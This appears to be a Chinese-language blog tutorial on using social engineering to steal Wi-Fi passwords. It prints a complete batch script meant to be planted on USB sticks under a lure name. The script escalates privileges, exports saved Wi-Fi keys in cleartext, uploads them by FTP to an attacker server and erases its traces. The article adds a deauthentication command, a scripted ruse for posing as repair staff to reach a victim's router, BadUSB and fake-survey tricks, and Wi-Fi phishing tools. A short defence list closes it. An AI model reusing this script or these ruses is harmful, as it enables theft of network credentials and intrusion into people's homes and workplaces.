何為社工?社工是一種通過(guò)利用受害者心理弱點(diǎn),如本能反應(yīng)、好奇心、同情心、信任、貪婪等進(jìn)行諸如欺騙、盜取、控制等非法手段的一種攻擊方式。在無(wú)線安全中也可以利用社工做到許多非法操作。下面舉幾個(gè)利用社工盜取wpa2密碼的例子:
0×01 移動(dòng)存儲(chǔ)攻擊
某寶小容量u盤,在u盤中存放一個(gè)bat批處理文件,并命名為誘使人點(diǎn)開的標(biāo)題,如:windows電腦優(yōu)化、私人照片等等。其實(shí)bat文件的內(nèi)容是這個(gè):
@echo off
>nul 2>&1 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system"
if '%errorlevel%' NEQ '0' (
goto UACPrompt
) else ( goto gotAdmin )
:UACPrompt
echo Set UAC = CreateObject^("Shell.Application"^) > "%temp%\getadmin.vbs"
echo UAC.ShellExecute "%~s0", "", "", "runas", 1 >> "%temp%\getadmin.vbs"
"%temp%\getadmin.vbs"
exit /B
:gotAdmin
if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" )
md c:\win
netsh wlan export profile key=clear folder=c:\win
echo open 服務(wù)器ip>C:\config.txt
echo user 賬號(hào)>>C:\config.txt
echo 密碼>>C:\config.txt
echo mput c:\win\*.xml>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo yes>>C:\config.txt
echo bye>>C:\config.txt
ftp -n -s:"C:\config.txt"
del C:\config.txt
del C:\win\*.xml
del %0
這個(gè)bat腳本會(huì)讀取本機(jī)連接過(guò)的wifi信息(包括密碼)打包到一個(gè)文件夾里并全部put到服務(wù)器上,然后刪除痕跡和自身防止服務(wù)器信息泄露。最后攻擊者就可以在自己的ftp服務(wù)器里挑選自己中意的wifi了。
攻擊演示:
打開此腳本

彈出cmd界面,1秒后消失(太快了不好截),bat腳本也隨之消失
查看ftp服務(wù)器

wifi信息已經(jīng)put上來(lái)了
進(jìn)入服務(wù)器打開一個(gè)xml文件

就拿到了密碼
可以自己在里面添加功能使社工效果更好,例如腳本名稱命名為某某公司有獎(jiǎng)問(wèn)卷調(diào)查,并添加打開調(diào)查問(wèn)卷的命令,使攻擊神不知鬼不覺。
若攻擊者將腳本拷入多個(gè)U盤后廣泛撒網(wǎng),就可以獲得該城市的大量wifi信息,影響極大。
0×02 直接接觸受害者
1.使用Deauthentication攻擊
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的時(shí)候(這個(gè)時(shí)候普遍在使用網(wǎng)絡(luò))對(duì)受害者使用斷網(wǎng)攻擊,等一小時(shí)后去敲門,詢問(wèn)網(wǎng)絡(luò)是否故障,詢問(wèn)網(wǎng)絡(luò)是哪家公司配置的,然后聲稱自己的網(wǎng)絡(luò)也故障了,是一樣的公司,然后詢問(wèn)報(bào)修電話并撥打,其實(shí)撥打的是其他人或根本沒有撥打,然后假裝是保修人員提示讓自己重啟路由器,攻擊者就可以接觸到受害者路由器,運(yùn)氣好的話路由器背面有pin碼,就可以撤退了。如果沒有,攻擊者就進(jìn)一步施壓,假裝被保修人員提示打開路由器管理界面在管理界面重啟路由器,乘機(jī)看到密碼。重啟完畢后手機(jī)ssh連接kali停止攻擊,造成重啟成功修復(fù)網(wǎng)絡(luò)的假象,然后撤退。2.結(jié)合移動(dòng)存儲(chǔ)攻擊,配合badusb,謊稱有重要文件需要發(fā)送然而手機(jī)沒電了,家里人還沒下班。第一天進(jìn)公司不想留下壞印象,從而直接接觸受害者電腦,插入badusb,執(zhí)行bat腳本或木馬
3.謊稱自己是某某公司或某某大學(xué)的,正在進(jìn)行網(wǎng)民安全意識(shí)的問(wèn)卷調(diào)查,并將其中帶有提問(wèn)wifi密碼的問(wèn)卷遞交受害者,從而獲得wifi密碼
0×03 wifi釣魚
利用fluxion、wifiphisher等工具實(shí)施釣魚攻擊:
https://github.com/FluxionNetwork/fluxion
https://github.com/sophron/wifiphisher ——項(xiàng)目地址
它們的大概原理是抓取受害者客戶端與wifi的握手包,對(duì)目標(biāo)客戶端實(shí)施wifi拒絕服務(wù)攻擊,發(fā)送大量解離包,然后偽造一個(gè)相同名稱的ap,受害者連接偽造的ap后會(huì)被解析到這個(gè)頁(yè)面:

受害者輸入密碼后會(huì)自動(dòng)與抓取的握手包進(jìn)行比對(duì),若正確,則停止拒絕服務(wù)攻擊。網(wǎng)上有很多wifi釣魚的教程,這里就不再闡述。
0×04 防御措施
1.綁定mac地址,設(shè)置白名單,只允許自己的機(jī)器連接wifi
2.隱藏wifi廣播,避免自己成為目標(biāo)
3.不要插入來(lái)路不明的u盤,不要打開來(lái)路不明的程序,不要連接來(lái)路不明的無(wú)線信號(hào)
4.盡量不讓陌生人接觸到自己的設(shè)備
5.wifi最好使用wpa2加密,并使密碼復(fù)雜度越高越好,盡量別在密碼里使用和自己有關(guān)的信息
6.定期更換路由器管理界面密碼和wifi密碼
7.最好關(guān)閉路由器上的wps功能
8.盡量不使用wifi萬(wàn)能鑰匙等類似軟件
|